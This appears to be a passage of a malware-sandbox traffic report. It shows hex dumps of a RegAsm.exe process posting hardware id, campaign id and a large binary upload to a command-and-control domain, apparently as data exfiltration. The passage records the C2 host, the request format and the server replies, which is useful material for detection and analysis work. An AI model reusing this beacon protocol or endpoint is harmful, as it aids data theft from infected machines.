                                2024-05-23 22:22:23 UTC547INData Raw: 64 34 31 0d 0a 4d 53 31 77 63 52 2f 36 2f 79 53 64 69 6e 4a 39 56 55 39 70 42 67 55 62 73 54 52 55 6b 62 34 4a 78 75 33 42 72 6c 74 37 6b 4a 6c 4b 4a 33 6c 54 61 64 6a 46 42 4b 6d 6d 65 48 52 33 50 41 77 6b 50 7a 76 46 52 69 48 30 6b 67 50 50 7a 36 44 4b 65 55 47 77 2f 31 42 42 41 78 51 7a 38 50 59 47 38 50 4a 51 52 33 55 55 59 77 39 2b 45 62 67 39 64 76 54 51 4b 2f 7a 4e 34 39 6b 2b 47 66 58 68 52 55 67 65 41 6e 61 56 6b 57 54 77 37 77 59 63 4f 43 34 61 62 53 74 79 33 68 5a 34 6d 37 63 41 35 49 69 37 6a 47 46 62 73 74 52 55 57 52 45 38 66 6f 6d 55 42 72 47 41 65 33 52 33 4b 68 30 6b 50 7a 75 54 61 48 62 68 33 33 75 6e 67 4c 4c 79 65 55 48 72 78 52 4e 45 42 42 52 74 6d 34 74 4e 38 75 51 42 49 58 64 31 58 7a 59 31 4b 34 45 45 4b 62 4f 30 41 4c 76 6e 79 50
                                Data Ascii: d41MS1wcR/6/ySdinJ9VU9pBgUbsTRUkb4Jxu3Brlt7kJlKJ3lTadjFBKmmeHR3PAwkPzvFRiH0kgPPz6DKeUGw/1BBAxQz8PYG8PJQR3UUYw9+Ebg9dvTQK/zN49k+GfXhRUgeAnaVkWTw7wYcOC4abSty3hZ4m7cA5Ii7jGFbstRUWRE8fomUBrGAe3R3Kh0kPzuTaHbh33ungLLyeUHrxRNEBBRtm4tN8uQBIXd1XzY1K4EEKbO0ALvnyP
                                2024-05-23 22:22:23 UTC1369INData Raw: 4d 6c 7a 4f 53 36 70 46 4a 79 73 76 78 66 44 30 70 52 50 5a 36 54 52 2f 4c 6f 41 68 63 38 4a 67 35 32 62 48 44 65 57 7a 62 2b 31 6d 53 6e 6a 36 54 47 4d 78 62 34 2f 31 35 43 46 42 4e 39 32 4e 4d 75 6c 49 4e 51 47 43 39 74 55 79 59 6e 57 74 5a 47 4d 66 2f 4b 4b 5a 37 50 79 36 63 6d 56 35 6d 35 45 53 64 35 43 68 58 7a 39 67 62 34 35 46 42 48 64 57 30 44 59 57 52 36 32 46 6b 31 2b 39 64 35 70 4a 32 6c 77 54 77 4c 39 50 35 64 52 52 45 42 64 35 61 62 52 66 62 6a 47 52 6f 77 4b 55 73 71 44 78 4b 34 46 6a 48 72 6e 44 50 6d 7a 34 4c 42 4d 68 58 34 37 46 4d 50 65 6e 68 69 31 76 55 74 35 6f 42 37 64 48 63 71 42 79 51 2f 4f 35 4e 53 4e 2f 66 64 62 36 71 42 70 38 41 2f 46 2f 2f 30 56 55 55 53 46 48 65 51 6c 55 66 79 34 78 38 66 4d 69 41 50 59 6d 74 34 31 68 5a 34 6d
                                Data Ascii: MlzOS6pFJysvxfD0pRPZ6TR/LoAhc8Jg52bHDeWzb+1mSnj6TGMxb4/15CFBN92NMulINQGC9tUyYnWtZGMf/KKZ7Py6cmV5m5ESd5ChXz9gb45FBHdW0DYWR62Fk1+9d5pJ2lwTwL9P5dRREBd5abRfbjGRowKUsqDxK4FjHrnDPmz4LBMhX47FMPenhi1vUt5oB7dHcqByQ/O5NSN/fdb6qBp8A/F//0VUUSFHeQlUfy4x8fMiAPYmt41hZ4m
                                2024-05-23 22:22:23 UTC1369INData Raw: 4e 34 38 38 31 46 50 76 2b 58 46 30 59 48 33 79 4b 6d 6b 2f 32 34 68 45 52 4f 43 59 48 59 58 56 79 33 46 34 35 38 74 46 6d 72 34 75 6a 6a 48 64 78 6d 5a 41 54 53 41 70 54 4a 64 72 64 5a 2f 4c 6e 41 68 77 6d 62 7a 35 6e 61 58 66 55 51 48 61 62 74 33 54 71 35 38 6a 56 55 58 4b 5a 75 31 52 44 55 6b 73 2f 32 4a 78 4b 38 2b 6b 66 47 54 30 6c 43 47 56 31 63 4e 78 65 4f 66 72 64 61 4b 43 4f 71 64 34 72 47 66 37 70 58 30 55 55 48 48 43 55 33 51 69 58 67 33 74 66 4d 44 56 4c 50 43 55 35 2b 56 55 69 38 4e 59 70 6b 59 79 74 77 6a 34 50 73 70 4d 34 55 46 78 37 46 6f 48 31 4c 5a 53 6f 46 78 4e 33 64 55 6b 6b 61 6e 6a 62 55 43 54 38 30 57 69 71 67 61 7a 4a 4e 68 48 79 2b 31 35 4b 46 68 68 32 6d 35 42 43 37 65 49 51 46 7a 49 73 41 57 34 6e 4e 37 73 39 58 62 50 62 63 2b
                                Data Ascii: N4881FPv+XF0YH3yKmk/24hEROCYHYXVy3F458tFmr4ujjHdxmZATSApTJdrdZ/LnAhwmbz5naXfUQHabt3Tq58jVUXKZu1RDUks/2JxK8+kfGT0lCGV1cNxeOfrdaKCOqd4rGf7pX0UUHHCU3QiXg3tfMDVLPCU5+VUi8NYpkYytwj4PspM4UFx7FoH1LZSoFxN3dUkkanjbUCT80WiqgazJNhHy+15KFhh2m5BC7eIQFzIsAW4nN7s9XbPbc+
                                2024-05-23 22:22:23 UTC115INData Raw: 4f 52 7a 67 38 31 56 49 48 68 74 34 6c 35 74 44 38 75 38 62 48 43 55 2f 43 47 42 70 64 5a 4d 59 58 70 69 33 4b 36 4f 58 34 35 52 37 57 64 66 73 55 46 38 55 45 44 33 77 39 6c 6d 78 67 48 73 47 58 30 5a 67 4a 47 42 31 6b 77 35 30 73 39 78 6c 71 49 53 6b 78 7a 49 64 39 76 74 65 52 42 77 64 64 4a 53 56 53 76 6a 36 48 52 6f 2f 4a 77 4a 68 61 0d 0a
                                Data Ascii: ORzg81VIHht4l5tD8u8bHCU/CGBpdZMYXpi3K6OX45R7WdfsUF8UED3w9lmxgHsGX0ZgJGB1kw50s9xlqISkxzId9vteRBwddJSVSvj6HRo/JwJha
                                2024-05-23 22:22:23 UTC1369INData Raw: 33 30 37 33 0d 0a 33 54 51 52 44 58 79 6e 43 58 4d 35 4d 69 4d 50 67 47 79 6f 78 45 50 4e 53 42 4b 75 39 30 75 6c 50 64 65 64 31 77 30 59 77 38 4d 4f 64 52 61 64 71 75 65 4b 36 57 48 70 4d 49 39 43 2f 7a 70 58 55 67 53 46 58 57 51 6d 6b 72 78 35 67 49 58 4e 69 30 46 61 32 39 77 31 31 63 79 39 39 42 73 35 4d 48 4c 70 31 4a 5a 39 65 4d 54 46 31 42 54 56 5a 75 48 58 4c 33 47 47 78 38 77 50 52 31 2f 4a 78 47 34 53 58 69 62 74 33 4c 4d 35 4d 69 4d 50 68 57 79 6f 78 45 50 46 68 68 33 6b 5a 35 50 2b 2b 55 51 46 6a 67 6b 41 32 6c 76 61 39 4a 63 4a 50 66 5a 61 71 75 46 70 38 51 31 46 76 37 2f 51 55 52 53 58 52 58 7a 39 67 62 34 38 46 42 48 64 57 30 72 62 33 46 61 77 55 52 32 6d 37 64 30 36 75 66 49 31 56 46 79 6d 62 74 55 51 31 4a 4c 50 39 69 55 53 76 37 70 47 68
                                Data Ascii: 30733TQRDXynCXM5MiMPgGyoxEPNSBKu90ulPded1w0Yw8MOdRadqueK6WHpMI9C/zpXUgSFXWQmkrx5gIXNi0Fa29w11cy99Bs5MHLp1JZ9eMTF1BTVZuHXL3GGx8wPR1/JxG4SXibt3LM5MiMPhWyoxEPFhh3kZ5P++UQFjgkA2lva9JcJPfZaquFp8Q1Fv7/QURSXRXz9gb48FBHdW0rb3FawUR2m7d06ufI1VFymbtUQ1JLP9iUSv7pGh
                                2024-05-23 22:22:23 UTC1369INData Raw: 62 32 35 38 33 31 63 39 2b 74 6c 76 72 6f 6d 75 6a 48 64 78 6d 5a 41 54 53 41 70 54 4a 64 72 64 61 76 7a 6e 47 31 39 66 52 68 51 71 44 78 4c 4b 50 6c 32 59 6e 47 79 6f 7a 2f 75 4f 65 52 37 36 38 31 31 4d 46 42 68 78 6c 4a 78 50 2b 65 30 59 47 44 67 71 41 6d 4e 6e 66 38 46 52 4f 2f 72 63 59 4b 32 46 70 38 30 79 57 62 79 54 4f 43 52 53 46 47 58 59 78 51 53 2f 32 68 63 4a 4a 79 35 4c 44 41 78 6d 6e 54 31 65 6d 4d 55 44 7a 2b 54 6a 79 7a 56 5a 71 72 6b 54 51 67 41 53 65 49 71 5a 53 66 54 36 47 78 6b 33 4b 42 6c 6a 61 33 50 63 56 54 37 2b 33 32 4f 32 6a 36 37 4d 4b 77 76 30 38 46 30 50 58 48 73 57 38 39 31 42 35 36 68 49 58 58 63 63 48 47 38 6e 45 62 68 4a 65 4a 69 30 41 4c 33 6e 79 4b 64 35 48 76 36 37 43 77 31 53 45 48 65 56 6b 31 54 37 37 68 73 63 4f 53 55
                                Data Ascii: b25831c9+tlvromujHdxmZATSApTJdrdavznG19fRhQqDxLKPl2YnGyoz/uOeR76811MFBhxlJxP+e0YGDgqAmNnf8FRO/rcYK2Fp80yWbyTOCRSFGXYxQS/2hcJJy5LDAxmnT1emMUDz+TjyzVZqrkTQgASeIqZSfT6Gxk3KBlja3PcVT7+32O2j67MKwv08F0PXHsW891B56hIXXccHG8nEbhJeJi0AL3nyKd5Hv67Cw1SEHeVk1T77hscOSU
                                2024-05-23 22:22:23 UTC1369INData Raw: 74 35 52 4d 50 72 4f 59 71 47 42 6f 38 67 79 46 76 54 2f 55 45 38 41 46 58 6d 51 6e 6b 76 79 35 68 4d 62 64 32 4e 6a 44 77 77 35 31 45 35 32 71 35 34 72 6c 6f 4b 74 31 7a 59 65 34 2f 45 54 4a 33 6b 4d 4d 2f 44 32 58 35 65 44 65 31 38 77 49 55 73 38 4a 54 6e 58 57 43 54 34 33 57 43 76 67 61 54 44 50 42 50 79 39 46 64 4d 48 42 68 38 6d 35 56 4c 38 75 59 61 46 6a 34 71 42 32 42 67 4f 5a 30 2b 58 5a 69 63 62 4c 7a 50 2b 34 35 35 4d 74 50 57 66 30 67 49 55 78 58 7a 67 67 69 58 67 77 6c 33 58 45 5a 4c 59 32 73 35 69 78 52 32 2f 39 56 6e 72 6f 53 6b 78 6a 63 51 2f 50 42 42 58 52 45 58 66 70 47 65 51 66 62 6d 45 42 67 79 49 77 78 6c 62 48 33 5a 56 54 43 7a 6b 67 50 50 35 4f 50 4c 49 56 6d 71 75 52 4e 6a 45 52 4e 77 67 74 30 75 6c 50 64 65 64 31 77 30 59 77 38 4d
                                Data Ascii: t5RMPrOYqGBo8gyFvT/UE8AFXmQnkvy5hMbd2NjDww51E52q54rloKt1zYe4/ETJ3kMM/D2X5eDe18wIUs8JTnXWCT43WCvgaTDPBPy9FdMHBh8m5VL8uYaFj4qB2BgOZ0+XZicbLzP+455MtPWf0gIUxXzggiXgwl3XEZLY2s5ixR2/9VnroSkxjcQ/PBBXREXfpGeQfbmEBgyIwxlbH3ZVTCzkgPP5OPLIVmquRNjERNwgt0ulPded1w0Yw8M
                                2024-05-23 22:22:23 UTC1369INData Raw: 75 7a 74 41 43 37 77 63 75 6e 49 48 47 5a 6b 42 4e 49 48 6c 4d 6c 32 74 31 4b 38 65 30 51 46 54 45 70 44 6d 4a 74 66 4e 4e 64 4e 66 7a 59 62 61 43 41 6f 38 63 77 47 50 54 2b 57 55 51 55 48 6e 36 65 6d 77 61 78 67 48 74 30 64 79 6f 54 4a 44 38 37 6b 33 59 74 2f 74 42 73 35 4f 66 49 30 33 64 78 6d 65 49 37 4a 48 6c 54 65 70 54 64 48 72 32 6f 47 78 4d 7a 4b 67 74 70 5a 48 48 57 55 6a 7a 32 33 47 4f 32 68 36 50 4c 4b 77 76 79 38 6c 5a 44 45 52 4e 35 6e 70 52 41 2f 4f 78 51 55 56 39 47 59 43 52 67 59 5a 4d 4f 64 4c 50 78 5a 36 4f 6d 70 4e 64 35 63 5a 6e 6b 48 53 64 35 43 68 58 7a 39 67 62 34 35 46 42 48 64 57 30 4b 62 32 31 32 33 6c 55 77 38 4e 64 75 72 6f 36 6b 78 44 51 4c 38 66 52 63 53 78 49 63 65 35 36 63 53 66 6e 76 47 52 34 2f 4b 6b 73 71 44 78 4b 34 46
                                Data Ascii: uztAC7wcunIHGZkBNIHlMl2t1K8e0QFTEpDmJtfNNdNfzYbaCAo8cwGPT+WUQUHn6emwaxgHt0dyoTJD87k3Yt/tBs5OfI03dxmeI7JHlTepTdHr2oGxMzKgtpZHHWUjz23GO2h6PLKwvy8lZDERN5npRA/OxQUV9GYCRgYZMOdLPxZ6OmpNd5cZnkHSd5ChXz9gb45FBHdW0Kb2123lUw8Nduro6kxDQL8fRcSxIce56cSfnvGR4/KksqDxK4F
                                2024-05-23 22:22:23 UTC1369INData Raw: 72 74 73 2f 37 6a 6e 6c 65 38 65 6c 42 53 52 45 46 66 74 2b 6a 65 4e 6a 2b 47 68 67 6e 4b 68 78 72 4a 7a 65 37 50 56 32 7a 30 79 76 38 7a 5a 71 6b 55 6e 4b 5a 75 31 70 49 43 51 4a 72 6c 59 31 42 76 34 42 37 64 41 68 6a 59 77 38 4d 4f 63 73 57 62 72 47 63 58 71 65 42 72 63 73 76 43 4c 2f 63 52 55 55 56 41 33 71 50 6b 67 61 78 67 48 74 30 64 79 74 4c 50 43 55 71 6e 54 35 64 6d 4a 78 76 74 63 2f 37 6a 6d 6c 4c 71 61 34 41 47 45 4a 42 46 66 4f 43 43 4a 65 44 43 58 64 63 52 6b 74 79 4a 79 47 52 42 48 69 62 74 77 44 6b 6e 65 4f 55 65 31 6d 31 2b 45 46 64 46 42 42 72 6d 39 70 34 77 63 38 4b 45 6a 45 36 47 6c 70 5a 66 73 6c 62 4d 4f 54 4e 4a 37 47 4d 72 63 49 2b 44 37 4b 31 4f 79 52 35 55 33 4c 59 78 51 54 47 71 46 68 66 43 47 4e 6a 44 77 77 35 79 78 5a 75 73 5a
                                Data Ascii: rts/7jnle8elBSREFft+jeNj+GhgnKhxrJze7PV2z0yv8zZqkUnKZu1pICQJrlY1Bv4B7dAhjYw8MOcsWbrGcXqeBrcsvCL/cRUUVA3qPkgaxgHt0dytLPCUqnT5dmJxvtc/7jmlLqa4AGEJBFfOCCJeDCXdcRktyJyGRBHibtwDkneOUe1m1+EFdFBBrm9p4wc8KEjE6GlpZfslbMOTNJ7GMrcI+D7K1OyR5U3LYxQTGqFhfCGNjDww5yxZusZ


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                29192.168.2.649751188.114.96.34435920C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:24 UTC288OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 1234
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:24 UTC1234OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:25 UTC814INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:25 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=s0ppgv9j6uj02gtk1cjaa007k3; expires=Mon, 16-Sep-2024 16:09:03 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lSvzJ26TeLsAMcfdGRG%2BoEUY4r%2F3%2FOWlgxihLQCfK9IzlwpQ3zyTKP3n4Uj4SfDZf7m6GHIGzaElpUIudVawsNmk4wWCsHoCQp9Nx1T0SCZXE123fpiSaTe%2BtpnqDR6tJYwmSwpJSELJDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871ca0fe143d5-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                30192.168.2.649750188.114.96.34433160C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:24 UTC289OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 12854
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:24 UTC12854OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:25 UTC810INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:25 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=roilkt33v61qs3qe7l233oc2ih; expires=Mon, 16-Sep-2024 16:09:03 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=48q62VXBJ48esg2WOEYBT9wWyaNxH%2Br4H48nsTKoFBWatOqpByduE1lB4xruBx6TXD%2Fr5y6vT4I5l2oNlbCA4OlVs82uIHYZSmXitTkPowvjqaev55AgmQifjsqNo50RXq4ZnwbFPfoJfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871ca0b48429a-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                31192.168.2.649752188.114.96.34433160C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:26 UTC289OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 15100
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:26 UTC15100OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:27 UTC824INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:27 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=pj49dve1vklkqmme50uegjhh0i; expires=Mon, 16-Sep-2024 16:09:06 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ttHEjxTqkufMMVmrC%2B8x0dvr5gGXgJUKjI01VgPA3F8dbRCmIr%2BC5%2FAg%2FSenB5sVTsvPViiht9W6%2FG3SoOgJxE%2Bn8jNMu%2BdWBVAG5unvQCmUfZQSZbNWJ5cLaBv%2BgGJExMB3bPoy28%2FDA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871db08b142f4-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                32192.168.2.649753188.114.96.34435920C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:27 UTC290OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 572276
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:27 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:27 UTC15331OUTData Raw: 77 b4 22 d5 56 b8 2f 56 83 cb 31 d7 50 ef 5c 7e 74 c7 77 fa 4f 49 97 d7 0a 1a 91 3e b0 a7 07 a2 7e db 38 1d ab 3c 98 9d 90 a0 b2 b7 9e b5 a8 17 76 3a f2 e1 ec a1 36 4d 08 3d ef f3 4e 05 2a 6f f2 8a 85 5c 50 a2 8b d4 12 04 95 cd e6 2a 15 00 be e2 66 93 f5 e2 a3 c3 93 ea 3c cc 2c 73 e9 97 2a fe 50 7a d9 de f0 ac e7 a2 a9 44 a6 20 82 ba e1 22 fc eb 65 98 23 58 ae be 79 6e f8 67 07 2b e3 15 7d 76 95 17 ec 26 01 aa 67 24 58 e6 5b cc c2 5a e0 b6 ac e7 53 57 d3 e3 6f ca c8 dc eb 4d 6b 67 ad 21 04 ab ae d7 0f be 5c b1 47 50 95 2d fe bf 87 31 7b b1 30 32 18 43 d6 66 4f 03 88 7b d5 6c 3e ec 0a 2c 11 6d 72 f3 2a 66 78 3a 8e 55 61 ae 2e 4b b5 9f 19 ca bb 85 cf 67 68 e7 4d 75 5b 80 7c 1c a6 17 09 f7 fe 76 ea 9b 85 a8 af c7 02 54 33 65 a3 f7 65 d8 96 61 24 db 42 49 fb
                                Data Ascii: w"V/V1P\~twOI>~8<v:6M=N*o\P*f<,s*PzD "e#Xyng+}v&g$X[ZSWoMkg!\GP-1{02CfO{l>,mr*fx:Ua.KghMu[|vT3eea$BI
                                2024-05-23 22:22:27 UTC15331OUTData Raw: ef 2d e3 e6 34 2d a4 67 7c 67 fc a7 9a 59 50 c4 53 c7 e6 07 80 7b ee 27 ab eb 27 af 81 3e 1a fe f3 98 b7 f2 98 68 7a 8c e6 8e eb af be 7a 5d f4 a3 5e 65 67 27 8c 95 ba cc 10 c5 f1 8c f4 e3 b5 93 c7 24 91 70 10 df d8 95 cb c7 fe 79 16 fa 36 3d d7 b9 c9 fe 22 ca 52 2a 04 dc a7 dc 5f 7e 2c 9d e5 f4 48 0f c7 27 a6 78 88 bb 5b 0c 2e a1 19 86 12 a0 64 b7 c9 9e c0 33 78 7c c2 85 a5 a1 7f e2 45 4f 15 45 ee 2f 48 f2 80 e1 4a dd 17 e5 2b 82 3f 06 fa 73 eb f5 87 7e 58 0b d2 8b 23 a5 85 85 67 2b 5d 43 4d 78 45 df a3 09 4f 9b e0 86 e2 b1 66 9c d2 b8 3d 08 fc a0 c1 97 f0 8e 10 11 f6 c2 50 49 81 61 d6 19 e5 45 d5 6d a9 60 e5 1c ff f3 69 17 71 6d a8 c7 fa c4 ec bd 7b 7b 5a 7e f3 48 af 61 1e be bd 76 dd dd e5 86 c5 d7 51 d2 f7 6a b7 17 96 86 0b f7 1d 0a 10 d5 c8 